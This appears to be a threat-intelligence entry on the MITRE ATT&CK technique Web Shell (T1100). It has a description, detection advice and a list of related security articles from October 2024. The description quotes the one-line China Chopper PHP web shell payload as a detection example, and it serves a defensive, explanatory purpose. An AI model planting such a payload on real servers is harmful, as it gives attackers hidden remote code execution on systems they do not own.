Common Information
Type | Value |
---|---|
Value |
Web Shell - T1100 |
Category | Attack-Pattern |
Type | Mitre-Enterprise-Attack-Attack-Pattern |
Misp Type | Cluster |
Description | A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013) Web shells may serve as Redundant Access or as a persistence mechanism in case an adversary's primary access methods are detected and removed. Detection: Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013) <code><?php @eval($_POST['password']);></code> Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running cmd or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) Platforms: Linux, macOS, Windows Data Sources: Anti-virus, File monitoring, Process monitoring, Authentication logs, Netflow/Enclave netflow Effective Permissions: User, SYSTEM System Requirements: Adversary access to Web server with vulnerability or account to upload and serve the Web shell file. |
Details | Published | Attributes | CTI | Title | ||
---|---|---|---|---|---|---|
Details | Website | 2024-10-29 | 1 | CVE Alert: CVE-2024-50495 - RedPacket Security | ||
Details | Website | 2024-10-29 | 2 | 49% of Enterprises Fail to Identify SaaS Vulnerabilities | ||
Details | Website | 2024-10-29 | 16 | Monthly Threat Actor Group Intelligence Report, July 2024 (JPN) – Red Alert | ||
Details | Website | 2024-10-29 | 28 | Monthly Threat Actor Group Intelligence Report, August 2024 (ENG) – Red Alert | ||
Details | Website | 2024-10-28 | 1185 | US-CERT Vulnerability Summary for the Week of October 21, 2024 - RedPacket Security | ||
Details | Website | 2024-10-28 | 0 | How to hack into a website using a back door | ||
Details | Website | 2024-10-28 | 997 | RST TI Report Digest: 28 Oct 2024 | ||
Details | Website | 2024-10-28 | 25 | Threat Intelligence Report October 22 - October 28 2024 | Red Piranha | ||
Details | Website | 2024-10-24 | 6 | TryHackMe — Cryptography Basics — Writeup | ||
Details | Website | 2024-10-24 | 12 | Understanding the Initial Stages of Web Shell and VPN Threats An MXDR Analysis | ||
Details | Website | 2024-10-24 | 7 | Development Features Enabled in Prodcution - SANS Internet Storm Center | ||
Details | Website | 2024-10-23 | 6 | TryHackMe — Shells Overview — Writeup | ||
Details | Website | 2024-10-23 | 158 | Unmasking Prometei A Deep Dive Into Our MXDR Findings | ||
Details | Website | 2024-10-22 | 22 | Threat Intelligence Report October 15 - October 21 2024 | Red Piranha | ||
Details | Website | 2024-10-21 | 945 | US-CERT Vulnerability Summary for the Week of October 14, 2024 - RedPacket Security | ||
Details | Website | 2024-10-21 | 1 | CVE Alert: CVE-2024-49329 - RedPacket Security | ||
Details | Website | 2024-10-21 | 1 | CVE Alert: CVE-2024-49327 - RedPacket Security | ||
Details | Website | 2024-10-21 | 1 | CVE Alert: CVE-2024-49607 - RedPacket Security | ||
Details | Website | 2024-10-21 | 1 | CVE Alert: CVE-2024-49324 - RedPacket Security | ||
Details | Website | 2024-10-21 | 1 | CVE Alert: CVE-2024-49331 - RedPacket Security | ||
Details | Website | 2024-10-21 | 1 | CVE Alert: CVE-2024-49330 - RedPacket Security | ||
Details | Website | 2024-10-21 | 1 | CVE Alert: CVE-2024-49610 - RedPacket Security | ||
Details | Website | 2024-10-19 | 21 | Unmasking the Cyber Mirage: A Journey Through Gulf Region Cyberattacks | ||
Details | Website | 2024-10-19 | 1 | CVE Alert: CVE-2024-49314 - RedPacket Security | ||
Details | Website | 2024-10-18 | 4 | Cybersecurity News Review — Week 42 |